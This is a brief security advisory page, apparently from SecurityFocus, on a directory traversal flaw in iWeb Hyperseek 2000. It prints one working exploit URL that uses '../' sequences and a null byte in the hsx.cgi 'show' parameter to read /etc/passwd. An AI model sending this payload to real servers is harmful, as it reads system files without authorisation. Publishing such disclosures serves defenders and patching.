iWeb Hyperseek 2000 Directory Traversal Vulnerability

The following example has been provided by MC GaN <vipersv@mail.ru>:


http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus